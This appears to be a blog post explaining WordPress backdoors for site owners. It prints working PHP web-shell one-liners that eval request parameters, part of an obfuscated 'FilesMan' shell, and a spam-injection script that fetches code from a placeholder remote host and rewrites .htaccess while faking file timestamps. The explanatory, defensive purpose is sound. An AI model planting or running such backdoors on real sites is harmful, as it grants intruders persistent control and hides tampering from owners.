Examples of Website Backdoors

It is quite common for hackers to place a “backdoor” on a site they have hacked. A backdoor can give a hacker continued access to the site even if the site owners have already changed their account passwords. Backdoor scripts will vary from hundreds of lines of code to 1-2 lines of code.

These are backdoors I see on WordPress sites, typically in the file wp-config.php…

if (isset($_REQUEST['FILE'])){$_FILE =$_REQUEST'12722f6d103997f30e9765d0153305'; $_FILE(stripslashes($_REQUEST['HOST']));}


if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '970a023a0983e5b4c9a2d3dd6adbd0b8') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }

This simple backdoor is tough to spot when it’s tucked into hundreds of lines of PHP code!

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

This single line of code are found in a file added to sites by the hackers, frequently disguised as part of a plugin or a theme. When the hackers request this file, they can execute any PHP code contained in the variable on the site.

The listing below is for a very common backdoor script called ‘FilesMan’…

<?php $auth_pass = ""; $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251";** or entries similar to this **$auth_pass = "47a85"."6c68".'e623468d84123?.'e87881d1e3?;$color = “#df5?;$default_action = "File".'sMa'.'n';$default_use_ajax = true;$default_charset = 'Windows-'.'1251';** splitting up "File".'sMa'.'n' makes it harder to find using tools like Grep **preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnYcB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuctoHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6z+HbmtmfiK5s6E/7W0ZOjeQ8an107[ I have cut a few thousand characters out of the middle]/2TbqT1h5uBDDyWQ2JxjxOVqKVYmsou2jN48pODXaOq3k71VGkMgAj0qBKIe23mhtlgqRPaiumPc1VyGEjNRmxfpq19yXeyRoyW1QL21EU9mG71ZbeZbVX1tkTGUgznaovNwCBb2LktysLQKgjU6GwP3egN5izU7PzTYD5Z57mAKbIg9ibZgzSLmzG/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx54qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B","."); ?>

This code is a backdoor used with a lot of the spam hacks. The backdoor writes/re-writes the .htaccess file and a PHP file that contains the conditions — is the user agent a “bot”? If Yes, adding the spammy content, the hackers will hide the file with an innocuous name, say .users.php and stick it in the least checked folder on the site. In a WordPress site of mine, the “filesman” file was named ajax.php and it was placed in the folder wp-admin/js/.

Now lets see some of those malicious codes and what in the hell they do…

Example 1:

if ( extension_loaded( "curl" ) ) { $ch = curl_init();curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/cnt.txt" );curl_setopt( $ch, CURLOPT_HEADER, 0 );curl_setopt( $ch, CURLOPT_​RETURNTRANSFER, 1 );$the-spam-content = curl_exec( $ch );curl_close( $ch );$ch = curl_init();curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/ht1.txt" );curl_setopt( $ch, CURLOPT_HEADER, 0 );curl_setopt( $ch, CURLOPT_​RETURNTRANSFER, 1 );$ht1_code = curl_exec( $ch );curl_close( $ch );$ch = curl_init();curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/ht2.txt" );curl_setopt( $ch, CURLOPT_HEADER, 0 );curl_setopt( $ch, CURLOPT_​RETURNTRANSFER, 1 );$ht2_code = curl_exec( $ch );curl_close( $ch ); }

The first part of the code checks to see if CURL is available and if it is the contents of 3 files is retrieved from a 2nd party site using CURL and stored in variables. http://2ndParty-Site.com/cgi-bin/cnt.txt -> $the-spam-content http://2ndParty-Site.com/cgi-bin/ht1.txt -> $ht1_code http://2ndParty-Site.com/cgi-bin/ht2.txt -> $ht2_code…

Example 2:

{$the-spam-content = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/cnt.txt" );$ht1_code = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/ht1.txt" );$ht2_code = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/ht2.txt" );}

This portion of the code will attempt to retrieve the content of the same 3 files using the PHP function ‘file_get_contents’. The ‘@’ character is used in PHP to suppress error messages. Again the contents of each of the 3 files is stored in a separate variable.

Example 3:

 	if ( is_file( "[site path]/​public_html/​index.html" ) ) {$index = "[site path]/​public_html/​index.html";}if ( is_file( "[site path]/​public_html/​index.htm" ) ) {$index = "[site path]/​public_html/​index.htm";}if ( is_file( "[site path]/​public_html/​.htaccess" ) ) {$index = "[site path]/​public_html/​.htaccess";}if ( is_file( "[site path]/​public_html/​favicon.ico" ) ) {$index = "[site path]/​public_html/​favicon.ico";}if ( is_file( "[site path]/​public_html/​index.php" ) ) {$index = "[site path]/​public_html/​index.php";}if ( is_file( "[site path]/​public_html/​common.php" ) ) {$index = "[site path]/​public_html/​common.php";}

This part of the code checks if one of these files, index.html, index.htm, .htaccess, favicon.ico, index.php, common.php exists and if it does, it stores the path to the file in the variable $index.

Example 4:

$time = filemtime( $index );$chmod = substr( sprintf( "%o", fileperms( $index ) ), -4 );$chmod = trim( $chmod );$chmod = intval( $chmod, 8 )

Using the path/file name from the previous step, this code stores the current values of the “last mod time” and the file permissions of the file in the variables $time and $chmod respectively.

Example 5:

@unlink( "[site path]/​public_html/​common.php" );$fp = fopen( "[site path]/​public_html/​common.php", "w" );fputs( $fp, $the-spam-content );fclose( $fp ); @chmod( "[site path]/​public_html/​common.php", $chmod ); touch( "[site path]/​public_html/​common.php", $time );

Using the PHP functions ‘fopen’ and ‘fputs’, this script writes the content of the variable ‘$the-spam-content’ into the file, ‘common.php’. In PHP using the “w” parameter with fopen telling php that if the file already exists, just write the content of the variable to the file. But if it does not exist, create the file and write the contents of the variable to the newly created file. The last two lines set the file permissions (chmod). They also set the last mod time (touch) of the file ‘common.php’ to the same permission and timestamp it got in the step above. The file ‘common.php’ now has the same file permission and timestamp as the sites index file or favicon.

Example 6:

$htaccess = str_replace( "#####​INCLUDE​#####", $ht2_code, $ht1_code );@unlink( "[site path]/​public_html/​.htaccess" );$fp = fopen( "[site path]/​public_html/​.htaccess", "w" );fputs( $fp, $htaccess );fclose( $fp );@chmod( "[site path]/​public_html/​.htaccess", $chmod );touch( "[site path]/​public_html/​.htaccess", $time );

This block of code is used to insert malicious content from the hacker to the .htaccess file…

Leave a Comment